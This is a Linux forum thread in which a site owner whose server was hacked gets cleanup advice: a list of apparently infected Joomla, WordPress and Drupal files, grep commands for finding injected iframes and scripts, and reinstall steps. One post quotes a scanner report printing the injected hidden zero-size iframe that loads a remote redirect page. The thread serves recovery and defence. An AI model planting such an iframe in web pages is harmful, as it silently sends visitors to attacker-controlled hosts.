./tmp/html/com_user/register/index.html
./tmp/html/mod_search/index.html
./tmp/html/index.html
./tmp/html/com_poll/poll/index.html
./tmp/html/com_poll/index.html
./tmp/html/mod_banners/index.html
./tmp/html/mod_syndicate/index.html
./tmp/html/com_newsfeeds/newsfeed/index.html
./tmp/html/com_newsfeeds/categories/index.html
./tmp/html/com_newsfeeds/index.html
./tmp/html/com_newsfeeds/category/index.html
./tmp/html/com_content/section/index.html
./tmp/html/com_content/article/index.html
./tmp/html/com_content/index.html
./tmp/html/com_content/frontpage/index.html
./tmp/html/com_content/category/index.html
./theblog/wp-content/themes/7730jm-photo/images/index.html
./theblog/wp-content/themes/7730jm-photo/component.php
./theblog/wp-content/themes/7730jm-photo/css/index.html
./theblog/wp-content/themes/7730jm-photo/index.html
./theblog/wp-content/themes/7730jm-photo/index.php
./theblog/wp-content/themes/7730jm-photo/html/mod_login/index.html
./theblog/wp-content/themes/7730jm-photo/html/mod_footer/index.html
./theblog/wp-content/themes/7730jm-photo/html/mod_search/index.html
./theblog/wp-content/themes/7730jm-photo/html/index.html
./theblog/wp-content/themes/7730jm-photo/html/mod_banners/index.html
./page1/themes/bluemarine/page.tpl.php
./page1/themes/garland/maintenance-page.tpl.php
./page1/themes/garland/page.tpl.php
./page1/themes/pushbutton/page.tpl.php
./page1/modules/book/book-export-html.tpl.php
./page1/modules/system/maintenance-page.tpl.php
./page1/modules/system/page.tpl.php
.................................................. ..........................
Originally Posted by Irithori
- 02-12-2013 #8Linux Enthusiast
- Join Date
- Apr 2012
- Location
- Virginia, USA
- Posts
- 561
So, a lot of times when a server gets hacked the DBs are infected too. You'll have to manually scrub your DBs as well as change their passwords. Originally Posted by bailenforcer
Anyway, best way I can think of is go to each directory and subdirectory and run the following (after stopping the webserver):
grep -i iframe *
That will search each file in the directory for an instance of "iframe"
The output of the command will be something like:
filename1: <iframe> blahblahblah
filename2: blha <ifRamE>blah blah blah
You get it.
Also change the admin login pw's for your website's admin login area, if applicable.
Also, I would run the same steps with
grep -i script *
and manually review each and every instance of a script reference. Lots of times there are off site java scripts embedded in each of the files.
After you have cleaned up your files (don't forget important config files such as httpd.conf / apache2.conf), archive them, scan them for viruses. Do the same with the DBs. Next, have your VM/VPS reinstalled fresh, and restore your files. This will prevent any tampered system files from performing as a root kit.
- 02-12-2013 #9Just Joined!
- Join Date
- Feb 2013
- Posts
- 5
The passwords were changed the second we knew there was an issue.
Here is a report from securi check.. I am not allowed to enter a url so I removed the http and added xxxx in place of it.
Known javascript malware.
Details:sucurinet/malware/malware-entry-mwiframeenc1560
<iframe src="xxxx://perevod.me/sts/sTDS/go.php?sid=1" width="0" height="0" frameborder="0"></iframe></body>
Hidden Iframes.
Details: sucurinet/malware/entry/MW:IFRAME:HD202
<iframe src="xxxx://perevod.me/sts/sTDS/go.php?sid=1" width="0" height="0" frameborder="0">
Originally Posted by mizzle
- 02-12-2013 #10Linux Enthusiast
- Join Date
- Apr 2012
- Location
- Virginia, USA
- Posts
- 561
I gave you the instructions to find the infected files and the other necessary steps. Originally Posted by bailenforcer
Reply With Quote 
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
